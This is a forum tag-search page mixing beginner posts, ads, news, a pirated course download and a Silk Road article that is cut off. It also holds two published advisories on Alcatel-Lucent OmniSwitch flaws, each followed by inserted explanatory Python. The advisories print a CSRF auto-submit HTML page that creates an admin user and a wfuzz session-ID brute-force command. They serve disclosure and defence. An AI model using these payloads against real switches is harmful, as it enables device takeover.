Showing results for tags 'web'.



Found 68 results

  1. Hello everyone, I'm a beginner but I still found a system error in my internet provider's SSL protocols. They fixed the problem quickly, within 24 hours, but I didn't even get a "thanks" out of it. Hurtful 😒 (I feel like taking revenge on them)
  2. Fitbit is building a new security team in Bucharest. Full details here: https://grnh.se/gmt7lrkc1

     Brief description of the job:
     The application security team at Fitbit is responsible for overseeing the secure design and implementation of applications. We do this by:
     • Consulting with software engineers to ensure the relevant controls are built into their work
     • Assessing software produced by Fitbit and its partners
     • Participating in the security community to understand new and emerging threats
     We try to achieve our mission through innovative ways of collaborating with our software teams that allow them to continue to deliver at scale and ve

     What You'll Work On:
     • Conduct threat modelling exercises
       • New security-sensitive functionality (e.g. changes to authentication flows) requires a security team member to be involved
       • New application infrastructure, e.g. entirely new SOA services, requires feedback from a security engineer
     • Provide application security consulting to engineers
     • Perform manual and automated code review
       • Our goal is to automate as much of our role as possible
       • Create rules to help us identify software that should be manually reviewed by a skilled application security engineer
       • Help enable self-service reviews for engineers
       • Work on tooling to expedite the process of doing software reviews
     • Perform ad-hoc application assessments
     • Assist with Fitbit's Bug Bounty programs
       • Help with the replication, prioritization and filing of issues identified via our bug bounty programs
     • Assist with Fitbit's developer outreach efforts
       • Share root cause analysis information with our outreach team to ensure we're educating our engineers about common security pitfalls and how to avoid them

     Required Skills:
     • Significant experience in application penetration testing and source code review
     • Knowledge of mobile and web application architecture
     • Ability to read and break code written in different languages, emphasis on Java
     • Strong understanding of applied cryptography
     • Strong understanding of web application security technologies like CORS, OAuth, JSONP and browser security concepts such as the same origin policy
     • Experience with static and dynamic application security tools
     • A passion for security and technology
     • Experience in a variety of software development environments and knowledge of contemporary agile software development methodologies
     • Experience with test-driven development and other agile practices
     • Broad knowledge of all areas of information technology including networking, operating systems and ideally application development
     • Strong software development skills in at least one language
     • Aspires to develop a deep understanding of information security
     • Experience as a system administrator or security engineer
     • Experience with managing information security incidents
     • Solves problems through scripting and automation
     • Willing to learn new things
     • Willing to look for innovative or non-standard solutions to problems
     • Good sense of humor
     • Calm under pressure
     • Good time management skills

     Interactions with other teams:
     The application security team is responsible for consulting with software engineering teams about the best and safest way to implement their features. They are also responsible for reviewing the output of software engineering teams for safety. As such, strong interpersonal skills are required. This person needs to be able to diplomatically provide software engineers with advice, and to coach developers through problems that may be identified in their work. The successful applicant will be able to positively influence software engineers' behaviour through their interactions.

     Nice-to-Have Skills:
     • Have a strong development background
     • Background in infrastructure penetration testing
     • Experience with compliance such as PCI and/or ISO27000
     • Experience with exploit/proof of concept development
     • Experience in information security consulting
     • Experience in in-house application security teams at larger technology companies with a reputation for security engineering
     • Had incident response experience
     • Developed tooling to automate information security tasks
     • Have a wide knowledge from diverse parts of IT
     • Worked on open source security projects
  3. Hi all, there is a website that I found where you can practice your website hacking skills. There are 50 vulnerabilities to be found, this website goes along with the courses from my previous course where I provide a URL with a plethora of courses The URL of this website: http://hackyourselffirst.troyhunt.com/ Good luck.
  4. I need someone to make me a certain script in iMacros! It's a very easy job: reading some data from a site and doing certain operations on that site, working with buttons and data, a few hours of work. If anyone is interested, PM me! I pay.
  5. Hi, can you recommend a web player for WordPress that takes YouTube links and plays them one after another... so it looks like a kind of live television, if you understand what I mean... I know you can make a playlist on YouTube and embed the link, but I don't want the viewer to be able to choose what they want and browse through the content. For any other details you want, ask me. Thanks in advance!
  6. Hi, I want a presentation site identical to the model I found; I'll send the details in private.
  7. Hello, I have a small problem. I made a classifieds site and I'm interested in the SEO side. When I say SEO, what I mean is: I want my clients' ads, when they publish one, to appear on Google. At the start, even if it takes a few days, I don't mind, but it should appear on the first page of Google. How could I do that, which files do I need to modify? Do I need to change the keywords and the page title every few days? Explain it to me. I use the open platform www.open-classifieds.com; I can't install plugins or anything, so give me a solution. I want the published ads to appear on Google on page one, two or three (I'm asking because I don't understand): if one appeared on page 5, how do I bring it to the first page? Thanks a lot. I didn't write very grammatically, I admit, but I don't want to sit and listen to someone's opinion that isn't about what I asked help for. THANKS A LOT
  8. Good evening! I need help: give me a name for a .ro site. The site will have all kinds of things, so I can't put it in a specific category. It can also be an invented word. What I'm especially interested in is that it has few results in Google, or 0. :-/:-/:-/:-/
  9. Summary: If you are looking for a web conferencing solution that is simple enough to use but complex enough to cope with commercial or educational web conferences (whether they are webinars, training sessions, live seminars, etc.), that is easy to use, accessible and affordable, have a look at a hidden, highly-underrated gem from Adobe: Adobe Connect (AC). Having dozens, perhaps hundreds of competitors, Adobe Connect (AC) stands out through its details that give the solution a flavour hard to resist.

     Context: Have been using Adobe Connect for a variety of purposes (teaching, learning, commercial, meetings) since 2012, when I carried out a little bit of research to see what solution would tick all (or most of) the boxes for my job at the time. Currently working and using it in an educational setting. Not employed nor paid/incentivized by Adobe.

     Description: AC is a web conferencing platform hosted by Adobe (with options for internal deployment for institutions) which allows users to participate in an online meeting without installing anything on local machines. It simply requires Flash Player (which most computers already have) or a free mobile app for tablets and mobile phones. To join a meeting, a user can simply click on the invitation link, type their name and join. For those with a poor internet connection, AC has an additional option of audio telephony (at extra cost) where the user can dial a landline number or a toll-free 0800 number and use that instead of the PC headset for listening and communicating. The platform is extremely flexible and caters for most needs and scenarios of usage. Whether one wishes to use AC for discussion, collaboration, separate classrooms, desktop sharing and remote control, presentation with Q&A, webinar, etc., they can do so by selecting from the menu what they want to use it for. All such meetings can be recorded and made available to specific users or the public straight after the recording has finished. There is also a small editor for such recordings and hosts can edit the recordings before releasing them. The main platform is very powerful customisation-wise: users can drag and move the interaction blocks (pods) and new customised pods can be added freely (some are premium, paid). For example, if one has a Flash application (game, countdown timer, etc.) they can add it to the platform. In the past I have used such Flash applications to embed YouTube video within it, add a visitors' lounge with a countdown timer for the next session and background music (while waiting), messages, voting apps, etc. Furthermore, participants can have a complete experience whilst using Adobe Connect. If there is a need for a teaching environment, a whiteboard facility is available and the presenter can make files available for students to download, PowerPoint with annotations, other notes, polls, live chat. If a formal meeting environment is needed, participants can use a live interactive agenda, notes, webcams, etc. The whole experience from access to netiquette is taken care of. Finally, content can be uploaded and set up in advance so that when the presenter (or guest speaker) joins, everything is ready to run. This saves the last-minute problems and delays and gives presenters the opportunity to prepare in a timely fashion and test everything before the live event. In my current workplace, Adobe Connect is being used by the Human Resources department for interviewing remote candidates unable to be here physically, it is being used to deliver online postgraduate courses and it also supports and facilitates blended learning programmes. We are using the on-cloud solution, hosted with Adobe. At the moment, as a negative point, it seems that their servers are quite overloaded and there hasn't been much investment recently towards a) infrastructure and codecs and audio processing so that sound is as clear as some of the other competitors (Google, Skype, etc.). Also, on the same negative note, the maximum video resolution supported is 480p. It is understandable to have limits on video (for bandwidth and quality) for large groups of participants, but for a small number of participants it would be good to have a higher resolution for video, given the current market trends. If one were to deploy the hosted version of Adobe Connect, they can adjust and with some hard work "hack" some parts of the product to improve call and video quality. However, the pricing for hosted solutions is quite prohibitive and its maintenance may become a burden in the long run.

     However, what makes Adobe Connect so attractive and better than its competitors (the likes of Google, Skype, WebEx, Lync, Blackboard Collaborate, etc.)? Its pricing of about £27.50/month/license (based on annual subscription) or £600 for 5 licenses per year, excluding set-up fees, audio telephony (if applicable) and VAT. Users don't need to install anything to join: simply click on the URL and join. Meetings can be recorded and made available. Flexible layouts, small features and functionality that help any host run smooth meetings. Free mobile app versions which allow users to attend meetings on the go. 24/7/365 support via phone, live chat or email in multiple languages. Overall good value for money for an easy-to-use system that delivers.

     Verdict: A web conferencing platform that can be used in a variety of ways to facilitate communication, learning and collaborative work. It bridges certain gaps and their support is fantastic. They do need some investment in audio and video quality and perhaps more customer interaction with a clear and good marketing strategy in providing a roadmap, truly listening to feedback and engaging users, but overall it is an excellent solution for a low-budget, good-quality web conference set-up. 8.5/10
  10. Hi, Do you guys know good web security companies in Romania or surroundings? If so, please provide me their websites. Thank you
  11. Microsoft product manager Duane Forrester says it will encrypt all Bing search traffic later this year. Forrester says the move follows Cupertino's 2014 decision to allow users to opt in to HTTPS for web searches. "Beginning this (Northern hemisphere) summer, we will begin the process of encrypting search traffic by default," Forrester blogged. "This means that traffic originating from Bing will increasingly come from https as opposed to http." Microsoft will also drop query search terms from referrer strings in a bid to further shore up privacy. Web ad bods will be able to learn the queries that lead users to their pages through Microsoft's search terms report, universal event tracking, and webmaster tools. "While this change may impact marketers and webmasters, we believe that providing a more secure search experience for our users is important," Forrester says. The HTTPS move brings Microsoft up to speed with Google, which began encrypting search traffic in 2011, making it compulsory in 2013, and Yahoo!, which deployed HTTPS for its search in 2014. Encrypting search traffic and other non-sensitive web traffic is widely seen by privacy and security pundits as necessary for a safer web. Source
  12. Video training : 7Kali.part1.rar (101,00 MB) - uploaded.net 7Kali.part2.rar (101,00 MB) - uploaded.net 7Kali.part3.rar (101,00 MB) - uploaded.net 7Kali.part4.rar (101,00 MB) - uploaded.net 7Kali.part5.rar (63,75 MB) - uploaded.net Have Funk!
  13. OkayFreedom VPN. A simple VPN service enabling private, uncensored web surfing. Access websites blocked in your country Use all of your favorite websites when abroad Access the web securely – even in public hotspots Surf the Net anonymously Protect your privacy on the internet OkayFreedom VPN Premium (100% Discount)
  14. Advisory: Alcatel-Lucent OmniSwitch Web Interface Cross-Site Request Forgery

      During a penetration test, RedTeam Pentesting discovered a vulnerability in the management web interface of an Alcatel-Lucent OmniSwitch 6450. The management web interface has no protection against cross-site request forgery attacks. This allows specially crafted web pages to change the switch configuration and create users, if an administrator accesses the website while being authenticated in the management web interface.

      Details
      =======
      Product: Alcatel-Lucent OmniSwitch 6450, 6250, 6850E, 9000E, 6400, 6855, 6900, 10K, 6860
      Affected Versions: All Releases:
          AOS 6.4.5.R02
          AOS 6.4.6.R01
          AOS 6.6.4.R01
          AOS 6.6.5.R02
          AOS 7.3.2.R01
          AOS 7.3.3.R01
          AOS 7.3.4.R01
          AOS 8.1.1.R01
      Fixed Versions: -
      Vulnerability Type: Cross-site request forgery
      Security Risk: medium
      Vendor URL: http://enterprise.alcatel-lucent.com/?product=OmniSwitch6450&page=overview
      Vendor Status: notified
      Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2015-004
      Advisory Status: published
      CVE: CVE-2015-2805
      CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2805

      Introduction
      ============
      "The Alcatel-Lucent OmniSwitch 6450 Gigabit and Fast Ethernet Stackable LAN Switches are the latest value stackable switches in the OmniSwitch family of products. The OmniSwitch 6450 was specifically built for versatility offering optional upgrade paths for 10 Gigabit stacking, 10 Gigabit Ethernet uplinks, from Fast to Gigabit user ports (L models) and Metro Ethernet services." (from the vendor's homepage)

      More Details
      ============
      The management web interface of the OmniSwitch 6450 can be accessed using a web browser via HTTP. The web interface allows creating new user accounts; in this case an HTTP request like the following is sent to the switch:

      POST /sec/content/sec_asa_users_local_db_add.html HTTP/1.1
      Host: 192.0.2.1
      [...]
      Cookie: session=sess_15739
      Content-Type: application/x-www-form-urlencoded
      Content-Length: 214

      EmWeb_ns:mip:2.T1:I1=attacker
      &EmWeb_ns:mip:244.T1:O1=secret
      &EmWeb_ns:mip:246.T1:O2=-1
      &EmWeb_ns:mip:248.T1:O3=
      &EmWeb_ns:mip:249.T1:O4=1
      &EmWeb_ns:mip:250.T1:O5=4

      This request creates a user "attacker" with the password "secret". All other parameters are static. All POST parameters can be predicted by attackers. This means that requests of this form can be prepared by attackers and sent from any web page the user visits in the same browser. If the user is authenticated to the switch, a valid session cookie is included in the request automatically, and the action is performed.

      In order to activate the new user for the web interface it is necessary to enable the respective access privileges in the user's profile. This can also be done via the web interface. Then the HTTP POST request looks like the following:

      POST /sec/content/os6250_sec_asa_users_local_db_family_mod.html HTTP/1.1
      Host: 192.0.2.1
      [...]
      Cookie: session=sess_15739
      Content-Type: application/x-www-form-urlencoded
      Content-Length: 167

      EmWeb_ns:mip:2.T1:I1=attacker
      &EmWeb_ns:mip:4.T1:O1=
      &EmWeb_ns:mip:5.T1:O2=
      &EmWeb_ns:mip:6.T1:O3=4294967295
      &EmWeb_ns:mip:7.T1:O4=4294967295

      This request sets all access privileges for the user "attacker" and is again completely predictable.

      Proof of Concept
      ================
      Visiting the following HTML page will create a new user via the switch's management web interface, if the user is authenticated at the switch:

      ------------------------------------------------------------------------
      <html>
      <head>
      <title>Alcatel-Lucent OmniSwitch 6450 create user via CSRF</title>
      </head>
      <body>
      <form action="http://192.0.2.1/sec/content/sec_asa_users_local_db_add.html"
            method="POST" id="CSRF" style="visibility:hidden">
      <input type="hidden" name="EmWeb_ns:mip:2.T1:I1" value="attacker" />
      <input type="hidden" name="EmWeb_ns:mip:244.T1:O1" value="secret" />
      <input type="hidden" name="EmWeb_ns:mip:244.T1:O2" value="-1" />
      <input type="hidden" name="EmWeb_ns:mip:244.T1:O3" value="" />
      <input type="hidden" name="EmWeb_ns:mip:244.T1:O4" value="1" />
      <input type="hidden" name="EmWeb_ns:mip:244.T1:O5" value="4" />
      </form>
      <script>
      document.getElementById("CSRF").submit();
      </script>
      </body>
      </html>
      ------------------------------------------------------------------------

      Workaround
      ==========
      Disable the web interface by executing the following commands:

      AOS6:
      no ip service http
      no ip service secure-http

      AOS 7/8:
      ip service http admin-state disable

      If this is not possible, use a dedicated browser or browser profile for managing the switch via the web interface.

      Fix
      ===
      Upgrade the firmware to a fixed version. According to the vendor, the fixed versions will be available at the end of July 2015.

      Security Risk
      =============
      If attackers trick a logged-in administrator into visiting an attacker-controlled web page, the attacker can perform actions and reconfigure the switch. In this situation an attacker can create an additional user account on the switch for future access. While a successful attack results in full access to the switch, the attack is hard to exploit because attackers need to know the IP address of the switch and get an administrative user to access an attacker-controlled web page. The vulnerability is therefore rated as a medium risk.

      Timeline
      ========
      2015-03-16 Vulnerability identified
      2015-03-25 Customer approves disclosure to vendor
      2015-03-26 CVE number requested
      2015-03-31 CVE number assigned
      2015-04-01 Vendor notified
      2015-04-02 Vendor acknowledged receipt of advisories
      2015-04-08 Requested status update from vendor, vendor is investigating
      2015-04-29 Requested status update from vendor, vendor is still investigating
      2015-05-22 Requested status update from vendor
      2015-05-27 Vendor is working on the issue
      2015-06-05 Vendor notified customers
      2015-06-08 Vendor provided details about affected versions
      2015-06-10 Advisory released

      RedTeam Pentesting GmbH
      Source
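An added example, not part of the advisory above and not the vendor's code: a small Python model of the "add user" endpoint, first behaving exactly as the advisory describes (any POST that carries a valid session cookie is executed), then with the two server-side controls that would have rejected the proof-of-concept page, a per-session synchronizer token in the form body and an Origin/Referer check. The endpoint path, form parameter names and switch address are taken from the advisory; the Request/Switch classes, the `csrf_token` field name, the attacker origin `http://attacker.example` and the 128-bit session IDs are assumptions made for this example.

```python
"""Added example (not from the advisory, not vendor code): the OmniSwitch
"add user" endpoint modelled without CSRF protection and with it.
Assumed for the example: Request/Switch classes, the csrf_token field name,
the attacker origin, and random 128-bit session IDs."""
import secrets
from dataclasses import dataclass, field
from urllib.parse import parse_qs

SWITCH_ORIGIN = "http://192.0.2.1"                          # switch address from the advisory
ADD_USER_PATH = "/sec/content/sec_asa_users_local_db_add.html"


@dataclass
class Request:
    path: str
    cookies: dict
    body: str                                   # application/x-www-form-urlencoded
    headers: dict = field(default_factory=dict)


@dataclass
class Switch:
    sessions: dict = field(default_factory=dict)   # session id -> {"user", "csrf"}
    users: dict = field(default_factory=dict)      # username -> password

    def login(self, user):
        sid = "sess_" + secrets.token_hex(16)      # 128 random bits (assumption)
        self.sessions[sid] = {"user": user, "csrf": secrets.token_urlsafe(32)}
        return sid

    def _session(self, req):
        return self.sessions.get(req.cookies.get("session"))

    def _create_user(self, form):
        self.users[form["EmWeb_ns:mip:2.T1:I1"][0]] = form["EmWeb_ns:mip:244.T1:O1"][0]

    def add_user_vulnerable(self, req):
        """Advisory behaviour: a valid session cookie is the only check."""
        if req.path != ADD_USER_PATH or self._session(req) is None:
            return 403
        self._create_user(parse_qs(req.body, keep_blank_values=True))
        return 200

    def add_user_hardened(self, req):
        sess = self._session(req)
        if req.path != ADD_USER_PATH or sess is None:
            return 403
        # Control 1: a cross-site form POST carries the attacker page's Origin
        # (or none at all); fail closed when the switch's own origin is absent.
        origin = req.headers.get("Origin") or req.headers.get("Referer", "")
        if origin != SWITCH_ORIGIN and not origin.startswith(SWITCH_ORIGIN + "/"):
            return 403
        # Control 2: synchronizer token. The attacker page cannot read the
        # victim's management page, so it cannot learn the per-session token.
        form = parse_qs(req.body, keep_blank_values=True)
        token = form.get("csrf_token", [""])[0]            # field name assumed
        if not secrets.compare_digest(token, sess["csrf"]):
            return 403
        self._create_user(form)
        return 200


# Form body from the advisory's first request, as the PoC page submits it.
CSRF_BODY = ("EmWeb_ns:mip:2.T1:I1=attacker&EmWeb_ns:mip:244.T1:O1=secret"
             "&EmWeb_ns:mip:246.T1:O2=-1&EmWeb_ns:mip:248.T1:O3="
             "&EmWeb_ns:mip:249.T1:O4=1&EmWeb_ns:mip:250.T1:O5=4")


def csrf_request(sid):
    """Cross-site POST: the browser attaches the victim's cookie, Origin is the attacker's."""
    return Request(ADD_USER_PATH, {"session": sid}, CSRF_BODY,
                   {"Origin": "http://attacker.example"})


def legitimate_request(switch, sid):
    """Same-origin POST carrying the token the switch rendered into the admin's form."""
    body = CSRF_BODY + "&csrf_token=" + switch.sessions[sid]["csrf"]
    return Request(ADD_USER_PATH, {"session": sid}, body, {"Origin": SWITCH_ORIGIN})


def demo():
    """Run the PoC body against both models; returns the HTTP statuses and outcomes."""
    vuln, hard = Switch(), Switch()
    sid_v, sid_h = vuln.login("admin"), hard.login("admin")
    return {
        "vulnerable_csrf": vuln.add_user_vulnerable(csrf_request(sid_v)),
        "vulnerable_created_attacker": "attacker" in vuln.users,
        "hardened_csrf": hard.add_user_hardened(csrf_request(sid_h)),
        "hardened_created_after_csrf": "attacker" in hard.users,
        "hardened_legit": hard.add_user_hardened(legitimate_request(hard, sid_h)),
        "hardened_created_after_legit": "attacker" in hard.users,
        "no_cookie": hard.add_user_hardened(Request(ADD_USER_PATH, {}, CSRF_BODY)),
    }


if __name__ == "__main__":
    print(demo())
```

Calling `demo()` shows the vulnerable model accepting the cross-site POST and creating "attacker", while the hardened model answers 403 to the same body and still accepts it once it carries the token and the switch's own Origin. The Origin check is the cheaper of the two for an embedded device because the browser sets that header on cross-site form posts and the attacker page cannot alter it; the token is what covers clients that send neither Origin nor Referer, which this model rejects rather than waves through.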
  15. Advisory: Alcatel-Lucent OmniSwitch Web Interface Weak Session ID

      During a penetration test, RedTeam Pentesting discovered a vulnerability in the management web interface of an Alcatel-Lucent OmniSwitch 6450. This interface uses easily guessable session IDs, which allows attackers to authenticate as a currently logged-in user and perform administrative tasks.

      Details
      =======
      Product: Alcatel-Lucent OmniSwitch 6450, 6250, 6850E, 9000E, 6400, 6855
      Affected Versions:
          AOS 6.4.5.R02
          AOS 6.4.6.R01
          AOS 6.6.4.R01
          AOS 6.6.5.R02
      Fixed Versions:
          AOS 6.6.5.80.R02
          AOS 6.6.4.309.R01
      Vulnerability Type: Session Management - low identifier entropy
      Security Risk: high
      Vendor URL: http://enterprise.alcatel-lucent.com/?product=OmniSwitch6450&page=overview
      Vendor Status: fixed version released
      Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2015-003
      Advisory Status: published
      CVE: CVE-2015-2804
      CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2804

      Introduction
      ============
      "The Alcatel-Lucent OmniSwitch 6450 Gigabit and Fast Ethernet Stackable LAN Switches are the latest value stackable switches in the OmniSwitch family of products. The OmniSwitch 6450 was specifically built for versatility offering optional upgrade paths for 10 Gigabit stacking, 10 Gigabit Ethernet uplinks, from Fast to Gigabit user ports (L models) and Metro Ethernet services." (from the vendor's homepage)

      More Details
      ============
      The management web interface of the OmniSwitch 6450 can be accessed using a web browser via HTTP. A switch with the example IP 192.0.2.1 is accessible via the following URL:

      http://192.0.2.1/

      A client is then redirected to the following URL:

      http://192.0.2.1/web/content/index.html

      For unauthenticated users the URL displays a login form and sets a session cookie with a session ID. A request to the URL with the command line HTTP client cURL shows the Set-Cookie header:

      $ curl -I http://192.0.2.1/web/content/index.html
      HTTP/1.1 200 OK
      Date: Tue, 17 Mar 2015 08:25:42 GMT
      Server: Agranat-EmWeb/R5_2_4
      [...]
      Set-Cookie: session=sess_11012;PATH=/

      The session cookie has the name "session" and its value begins with the string "sess_". By repeatedly requesting the URL with cURL it became obvious that the suffix is always a number between 1 and 32,000. This suggests that there are only about 32,000 possible session IDs, resulting in only 15 bits of entropy. Our tests showed that it was possible to get a throughput of about 50 HTTP requests per second; this means that in order to try every possible session ID an attacker will need at most 11 minutes. On average, the time it takes to find a valid session ID for an active user is even lower.

      Proof of Concept
      ================
      For an attacker it is very easy to distinguish between a valid and an invalid session ID by looking at the HTTP response size. During our tests, requesting an invalid session ID always returned the login form, which was 3027 bytes in length. With a valid session ID, the management web interface is returned by the webserver and the response is larger. A number of requests in the range of the possible session cookies can be easily executed using wfuzz [0]:

      ------------------------------------------------------------------------
      ./wfuzz.py -z range,1-32000 --hl 3027 -H "Cookie: session=sess_FUZZ" http://192.0.2.1/web/content/index.html
      ------------------------------------------------------------------------

      Workaround
      ==========
      Administrators should avoid using the management web interface and use the serial console or administrate the switch over SSH instead. The web interface can be disabled by executing the following commands:

      no ip service http
      no ip service secure-http

      If the web interface is needed, it must be ensured that only authorised persons are able to even connect to the web server. In addition, the HTTP session timeout can be lowered to one minute with the following command:

      session timeout http 1

      Fix
      ===
      Upgrade the firmware to a fixed version.

      Security Risk
      =============
      The vulnerability poses a high risk. An attacker can easily authenticate to a switch with the privileges of another user who is currently logged in. The attack is simple and fast. The only precondition is that a user is already using the switch during the attack. Attackers might actively trick administrators into logging in by social engineering.

      Timeline
      ========
      2015-03-16 Vulnerability identified
      2015-03-25 Customer approves disclosure to vendor
      2015-03-26 CVE number requested
      2015-03-31 CVE number assigned
      2015-04-01 Vendor notified
      2015-04-02 Vendor acknowledged receipt of advisories
      2015-04-08 Requested status update from vendor, vendor is investigating
      2015-04-29 Requested status update from vendor, vendor is still investigating
      2015-05-22 Requested status update from vendor
      2015-05-27 Vendor is working on the issue
      2015-06-05 Vendor notified customers
      2015-06-08 Vendor provided details about affected versions
      2015-06-10 Advisory released

      References
      ==========
      [0] https://github.com/xmendez/wfuzz

      RedTeam Pentesting GmbH
      Source
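An added example, not part of the advisory above: the entropy and brute-force arithmetic the advisory walks through, applied to a sample of Set-Cookie headers, together with the response-length oracle its wfuzz line relies on, run against a stand-in server so the whole thing works offline. The header lines and the `ToySwitch` class are constructed for this example; the `session=sess_<n>` format, the 32,000-ID space, the 50 requests per second and the 3027-byte login form are the advisory's own figures. For contrast it also sizes the search for a 128-bit random identifier, which is what a fixed implementation should be issuing.

```python
"""Added example (not from the advisory): how guessable a session ID scheme is,
and how a response-length oracle separates valid from invalid sessions.
Constructed here: SAMPLE_HEADERS and ToySwitch. From the advisory: the cookie
format, the 32,000 ID space, 50 requests/second, the 3027-byte login form."""
import math
import re
import secrets

COOKIE_RE = re.compile(r"Set-Cookie:\s*session=sess_(\d+)", re.IGNORECASE)
LOGIN_FORM_LENGTH = 3027     # bytes returned for an invalid session (advisory)
ADVISORY_SPACE = 32_000      # observed range of the sess_<n> suffix (advisory)
ADVISORY_RPS = 50            # request throughput the testers achieved (advisory)

# Constructed sample in the format the advisory's curl output shows.
SAMPLE_HEADERS = [
    "HTTP/1.1 200 OK",
    "Server: Agranat-EmWeb/R5_2_4",
    "Set-Cookie: session=sess_11012;PATH=/",
    "Set-Cookie: session=sess_15739;PATH=/",
    "Set-Cookie: session=sess_3;PATH=/",
]


def session_ids(header_lines):
    """Numeric suffix of every session=sess_<n> cookie found in the header lines."""
    ids = []
    for line in header_lines:
        m = COOKIE_RE.search(line)
        if m:
            ids.append(int(m.group(1)))
    return ids


def entropy_bits(space_size):
    """Entropy of an ID drawn uniformly from a space of space_size values."""
    return math.log2(space_size)


def worst_case_seconds(space_size, requests_per_second):
    """Time to try every ID once; one live session is found after half that on average."""
    return space_size / requests_per_second


def assess(header_lines, space_size=None, requests_per_second=ADVISORY_RPS):
    """Summarise a sample. Without an explicit space_size the largest observed ID
    is used, which is only a lower bound on the real space (the advisory got its
    32,000 by sampling repeatedly)."""
    ids = session_ids(header_lines)
    space = space_size if space_size is not None else max(ids)
    return {
        "ids": ids,
        "space": space,
        "bits": entropy_bits(space),
        "worst_case_minutes": worst_case_seconds(space, requests_per_second) / 60,
    }


class ToySwitch:
    """Stand-in for the switch web server with one logged-in administrator.
    An invalid cookie gets the fixed-size login form; the valid one gets the
    larger management page. That size difference is the oracle."""
    def __init__(self, active_id):
        self.active_cookie = f"sess_{active_id}"
        self.requests = 0

    def get_index(self, cookie_value):
        self.requests += 1
        if cookie_value == self.active_cookie:
            return b"<html>management interface</html>".ljust(4096, b" ")
        return b"<html>login form</html>".ljust(LOGIN_FORM_LENGTH, b" ")


def find_valid_sessions(server, space_size=ADVISORY_SPACE):
    """The filtering the advisory's wfuzz line performs: try sess_1..sess_N and
    keep every ID whose response length differs from the login form's."""
    return [n for n in range(1, space_size + 1)
            if len(server.get_index(f"sess_{n}")) != LOGIN_FORM_LENGTH]


def strong_session_id():
    """For contrast: 128 random bits from the OS CSPRNG."""
    return "sess_" + secrets.token_hex(16)


def strong_id_worst_case_years(requests_per_second=ADVISORY_RPS):
    """Enumeration time for a 128-bit space at the same request rate, in years."""
    return worst_case_seconds(2 ** 128, requests_per_second) / (3600 * 24 * 365)


if __name__ == "__main__":
    print(assess(SAMPLE_HEADERS, space_size=ADVISORY_SPACE))
    print(find_valid_sessions(ToySwitch(15739)))
    print(strong_session_id(), strong_id_worst_case_years())
```

`assess(SAMPLE_HEADERS, space_size=ADVISORY_SPACE)` reproduces the advisory's numbers (about 15 bits, under 11 minutes for a full sweep), and `find_valid_sessions` returns only the administrator's ID after exactly 32,000 probes. The oracle depends on nothing but the response size, so rate limiting and a short session timeout (the advisory's `session timeout http 1`) shrink the window but do not remove the flaw; only a random identifier of adequate length does.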
  16. Selling web traffic, worldwide / Romania (I don't have very much): 10.000k/day, 50 euro/month
  17. My name is Bogdan. Among my passions are WEB programming + design. I hope I've ended up in the right place... Thanks!
  18. WHEN ROSS ULBRICHT was sentenced to life in prison without parole last Friday, the judge in his case made clear that her severe punishment wasn't only about Ulbricht's personal actions in creating the Silk Road's billion-dollar drug market. As Judge Katherine Forrest told the packed courtroom, she was also sending a message to any would-be online drug kingpins who might follow in his footsteps. "For those considering stepping into your shoes," she said, "they need to understand without equivocation that there will be severe consequences." But despite Ulbricht's ultimate punishment, the lesson for anyone closely watching the Dark Web drug trade has hardly been one of inevitable consequences. As independent researcher Gwern Branwen has documented in an ongoing survey of more than 70 Dark Web drug markets created after Ulbricht founded the Silk Road, only five of those sites' administrators have been arrested. For many of the others, the security model Ulbricht pioneered—using Tor and bitcoin to protect administrators, buyers and sellers—has successfully kept law enforcement fumbling in the shadows. In fact, the difficulty of laying hands on Dark Web drug market creators was one reason Ulbricht's prosecutors asked for a lengthy sentence. If law enforcement can't apprehend all Ulbricht imitators, went prosecutors' argument, it had better compensate with harsher punishment for those it does catch. "Although the Government has achieved some successes in combating these successor dark markets, they continue to pose investigative challenges for law enforcement," read the prosecution's letter. "To the extent that would-be imitators may view the risk of being caught to be low, many are still likely to be deterred if the stakes are sufficiently high." When Ross Ulbricht begins his life sentence at a federal prison in the coming weeks, in other words, he won't just be serving his own time. He'll also be serving the time of all the Dark Web drug lords who escaped his fate. Here are five of those online narco-kingpins who—for now—remain at large.

      Variety Jones
      Despite Ulbricht's arrest and the rounding up of four of his Silk Road lieutenants, the second most important figure in that black market operation still hasn't been captured or even publicly identified. Variety Jones served as Ulbricht's security consultant, advisor, and even mentor, according to Ulbricht's journal and chat logs the prosecutors admitted into evidence at trial. The anonymous figure, who sold cannabis seeds on the site, also secretly advised Ulbricht on everything from tracking sales statistics to creating a personal cover story. It was Jones who named him the Dread Pirate Roberts to give the impression of a rotating command rather than a single individual. And Jones also nudged the Dread Pirate Roberts toward violence, suggesting in a private chat that they murder an employee believed to have stolen hundreds of thousands of dollars in bitcoin from the site.

      Atlantis
      During the Silk Road's time online, its most aggressive competition came from a site called Atlantis, a Dark Web market with a similar business model, but with the addition of an advertising budget. Atlantis went so far as to post a public YouTube video ad and to host an "ask-me-anything" session on Reddit with the site's unnamed founder and its CEO. In an encrypted interview, those leaders would later describe their site to me as the "Facebook to [Silk Road's] Myspace." Just before the FBI bust of the Silk Road in the summer of 2013, however, Atlantis' founders shuttered their site and absconded with all their users' bitcoins. Ross Ulbricht would write in his journal that the Atlantis admins had privately warned him of a purported security flaw in Tor that inspired them to abandon ship. The Atlantis creators never resurfaced—neither online nor in the hands of law enforcement.

      Dread Pirate Roberts 2
      Just one month after the original Silk Road was seized, Silk Road 2 came online. At its helm, of course, was a new Dread Pirate Roberts; Ulbricht's cover story of a rotating command had become a self-fulfilling prophecy. The second DPR was at least as talkative as the first, posting political statements to the Silk Road 2 forums and even creating a Twitter account. But after three Silk Road 2 administrators were arrested—all of whom had worked for the original Dread Pirate Roberts on Silk Road 1.0—the new Dread Pirate Roberts gave up control of the site to a new administrator named Defcon. Defcon would be identified as 26-year-old Blake Benthal and arrested as part of Operation Onymous, a mass purge of Dark Web sites by the FBI and Europol late last year that took down dozens of Tor hidden services. But the second Dread Pirate Roberts seemed to escape that international dragnet.

      Verto
